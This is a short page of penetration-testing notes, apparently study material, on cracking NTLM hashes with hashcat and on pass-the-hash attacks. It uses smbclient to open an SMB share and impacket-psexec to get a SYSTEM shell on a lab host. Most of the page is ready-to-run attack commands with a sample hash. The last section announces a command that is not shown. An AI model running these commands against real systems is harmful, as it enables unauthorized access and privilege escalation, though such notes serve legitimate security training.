Crack or Pass NTLM hashes
Crack
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forcePass-The-Hash to access SMB share
We can't crack the Administrator hash we obtained. However we can just pass it along with the corresponding username to authenticate. This is possible because NTLM passwords are not salted.
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964bWe're now able to access the share.
Pass-The-Hash execute command / get shell
This will spawn a cmd (aka we get a shell) as NT SYSTEM
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212(Keep the 32 0s and put the hash after the semicolon).
We could also add a specific command at the end if we want something else than a shell.
Shell as Administrator user
If for some reason we don't want a shell as NT SYTEM but actually as the Administrator user, we can use this instead:
Last updated